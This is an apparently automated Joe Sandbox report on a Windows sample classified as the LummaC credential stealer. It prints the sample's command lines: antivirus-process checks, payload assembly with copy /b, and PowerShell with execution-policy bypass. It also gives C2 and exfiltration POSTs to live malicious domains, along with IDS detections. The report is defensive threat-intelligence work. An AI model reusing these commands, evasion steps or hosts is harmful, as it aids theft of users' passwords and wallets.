Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
eMBO6wS1b5.exe

Overview

General Information

Sample name:eMBO6wS1b5.exe
renamed because original name is a hash value
Original sample name:73565a0bcdcb7ff5f9ce005a2530e215.exe
Analysis ID:1580261
MD5:73565a0bcdcb7ff5f9ce005a2530e215
SHA1:d5b3f48caa2b3c5bd9258cc3f8ce7b41c3d5b22b
SHA256:0da872d62bc25e38d6eac1f6d2f35f8301dfa06087cc68c50ea93f326f934b8c
Tags:exeLummaStealeruser-abuse_ch
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Drops PE files with a suspicious file extension
Loading BitLocker PowerShell Module
Query firmware table information (likely to detect VMs)
Sigma detected: Suspicious PowerShell Parameter Substring
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • eMBO6wS1b5.exe (PID: 5432 cmdline: "C:\Users\user\Desktop\eMBO6wS1b5.exe" MD5: 73565A0BCDCB7FF5F9CE005A2530E215)
    • cmd.exe (PID: 3064 cmdline: "C:\Windows\System32\cmd.exe" /c move Leu Leu.cmd & Leu.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3200 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 504 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 2836 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6888 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 416 cmdline: cmd /c md 801291 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 380 cmdline: extrac32 /Y /E Array MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 828 cmdline: findstr /V "Serve" Ltd MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2192 cmdline: cmd /c copy /b ..\Bumper + ..\Specialist + ..\Bind + ..\Intended + ..\Francisco + ..\Recent f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Historic.com (PID: 6716 cmdline: Historic.com f MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 5192 cmdline: powershell -exec bypass error code: 523 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 716 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Historic.com f, ParentImage: C:\Users\user\AppData\Local\Temp\801291\Historic.com, ParentProcessId: 6716, ParentProcessName: Historic.com, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 5192, ProcessName: powershell.exe
      Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Historic.com f, ParentImage: C:\Users\user\AppData\Local\Temp\801291\Historic.com, ParentProcessId: 6716, ParentProcessName: Historic.com, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 5192, ProcessName: powershell.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Historic.com f, ParentImage: C:\Users\user\AppData\Local\Temp\801291\Historic.com, ParentProcessId: 6716, ParentProcessName: Historic.com, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 5192, ProcessName: powershell.exe

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Leu Leu.cmd & Leu.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3064, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6888, ProcessName: findstr.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T08:18:44.441343+010020283713Unknown Traffic192.168.2.649800104.21.18.185443TCP
      2024-12-24T08:18:46.528423+010020283713Unknown Traffic192.168.2.649804104.21.18.185443TCP
      2024-12-24T08:18:48.858808+010020283713Unknown Traffic192.168.2.649816104.21.18.185443TCP
      2024-12-24T08:18:51.034060+010020283713Unknown Traffic192.168.2.649823104.21.18.185443TCP
      2024-12-24T08:18:53.265297+010020283713Unknown Traffic192.168.2.649829104.21.18.185443TCP
      2024-12-24T08:18:55.689052+010020283713Unknown Traffic192.168.2.649835104.21.18.185443TCP
      2024-12-24T08:18:57.676428+010020283713Unknown Traffic192.168.2.649841104.21.18.185443TCP
      2024-12-24T08:19:00.437287+010020283713Unknown Traffic192.168.2.649847104.21.18.185443TCP
      2024-12-24T08:19:04.035566+010020283713Unknown Traffic192.168.2.649859104.21.18.185443TCP
      2024-12-24T08:19:06.653357+010020283713Unknown Traffic192.168.2.649865172.67.169.205443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T08:18:45.185987+010020546531A Network Trojan was detected192.168.2.649800104.21.18.185443TCP
      2024-12-24T08:18:47.296491+010020546531A Network Trojan was detected192.168.2.649804104.21.18.185443TCP
      2024-12-24T08:19:05.111929+010020546531A Network Trojan was detected192.168.2.649859104.21.18.185443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T08:18:45.185987+010020498361A Network Trojan was detected192.168.2.649800104.21.18.185443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T08:18:47.296491+010020498121A Network Trojan was detected192.168.2.649804104.21.18.185443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-24T08:18:49.805687+010020480941Malware Command and Control Activity Detected192.168.2.649816104.21.18.185443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: eMBO6wS1b5.exeReversingLabs: Detection: 26%
      Source: eMBO6wS1b5.exeVirustotal: Detection: 20%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 88.1% probability
      Source: eMBO6wS1b5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49800 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49804 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49816 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49823 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49829 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49835 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49841 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49847 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49859 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.169.205:443 -> 192.168.2.6:49865 version: TLS 1.2
      Source: eMBO6wS1b5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000001C.00000002.2838688444.0000000007104000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbi source: powershell.exe, 0000001C.00000002.2842137856.00000000081B6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000001C.00000002.2841888990.0000000008183000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeCode function: 1_2_00406301 FindFirstFileW,FindClose,1_2_00406301
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeCode function: 1_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\801291\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\801291Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49800 -> 104.21.18.185:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49800 -> 104.21.18.185:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49816 -> 104.21.18.185:443
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49804 -> 104.21.18.185:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49804 -> 104.21.18.185:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49859 -> 104.21.18.185:443
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49823 -> 104.21.18.185:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49816 -> 104.21.18.185:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49847 -> 104.21.18.185:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49804 -> 104.21.18.185:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49829 -> 104.21.18.185:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49859 -> 104.21.18.185:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49835 -> 104.21.18.185:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49800 -> 104.21.18.185:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49841 -> 104.21.18.185:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49865 -> 172.67.169.205:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: beefshooti.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 76Host: beefshooti.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HOFSZB3NXG21F57User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12838Host: beefshooti.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WA8MYOEBFSIEMI6MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15090Host: beefshooti.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1K408MOPVWB9ASUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19936Host: beefshooti.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=US7WOO14DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5421Host: beefshooti.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=P8I4UTF54QOGS6JRI2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1255Host: beefshooti.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=21CPJTJTVPRRPRWM8BUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 578920Host: beefshooti.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 111Host: beefshooti.click
      Source: global trafficHTTP traffic detected: GET /sdgjyut/psh.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: neqi.shop
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /sdgjyut/psh.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: neqi.shop
      Source: global trafficDNS traffic detected: DNS query: jIjmPxXivVpjpLDcixRH.jIjmPxXivVpjpLDcixRH
      Source: global trafficDNS traffic detected: DNS query: tse1.mm.bing.net
      Source: global trafficDNS traffic detected: DNS query: beefshooti.click
      Source: global trafficDNS traffic detected: DNS query: neqi.shop
      Source: global trafficDNS traffic detected: DNS query: klipcatepiu0.shop
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: beefshooti.click
      Source: eMBO6wS1b5.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: eMBO6wS1b5.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: eMBO6wS1b5.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: Historic.com.3.dr, Everything.14.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: eMBO6wS1b5.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
      Source: Historic.com.3.dr, Everything.14.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: eMBO6wS1b5.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
      Source: eMBO6wS1b5.exe, Historic.com.3.dr, Everything.14.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Historic.com.3.dr, Everything.14.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Historic.com.3.dr, Everything.14.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: powershell.exe, 0000001C.00000002.2841733957.000000000817F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
      Source: eMBO6wS1b5.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: eMBO6wS1b5.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: eMBO6wS1b5.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: powershell.exe, 0000001C.00000002.2835357604.0000000004E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
      Source: eMBO6wS1b5.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 0000001C.00000002.2837123581.0000000005AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: eMBO6wS1b5.exeString found in binary or memory: http://ocsp.digicert.com0A
      Source: eMBO6wS1b5.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: eMBO6wS1b5.exeString found in binary or memory: http://ocsp.digicert.com0X
      Source: Historic.com.3.dr, Everything.14.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: eMBO6wS1b5.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
      Source: eMBO6wS1b5.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
      Source: eMBO6wS1b5.exeString found in binary or memory: http://ocsp.globalsign.com/rootr30;
      Source: Historic.com.3.dr, Everything.14.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Historic.com.3.dr, Everything.14.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Historic.com.3.dr, Everything.14.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: powershell.exe, 0000001C.00000002.2835357604.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 0000001C.00000002.2835357604.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 0000001C.00000002.2835357604.0000000004A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 0000001C.00000002.2835357604.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: eMBO6wS1b5.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
      Source: Historic.com.3.dr, Everything.14.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: eMBO6wS1b5.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
      Source: Historic.com.3.dr, Everything.14.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: eMBO6wS1b5.exeString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
      Source: powershell.exe, 0000001C.00000002.2835357604.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: Historic.com, 00000011.00000000.2201259639.0000000000635000.00000002.00000001.01000000.00000007.sdmp, Historic.com.3.dr, Everything.14.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: powershell.exe, 0000001C.00000002.2838688444.0000000007104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka..oub
      Source: powershell.exe, 0000001C.00000002.2835357604.0000000004A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 0000001C.00000002.2835357604.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 0000001C.00000002.2837123581.0000000005AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 0000001C.00000002.2837123581.0000000005AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 0000001C.00000002.2837123581.0000000005AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 0000001C.00000002.2835357604.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 0000001C.00000002.2837123581.0000000005AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: Historic.com.3.dr, Everything.14.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Everything.14.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49800 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49804 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49816 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49823 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49829 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49835 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49841 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49847 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.18.185:443 -> 192.168.2.6:49859 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.169.205:443 -> 192.168.2.6:49865 version: TLS 1.2
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeCode function: 1_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004050F9
      Source: C:\Users\user\Desktop\eMBO6wS1b5.exeCode function: 1_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_004044D1
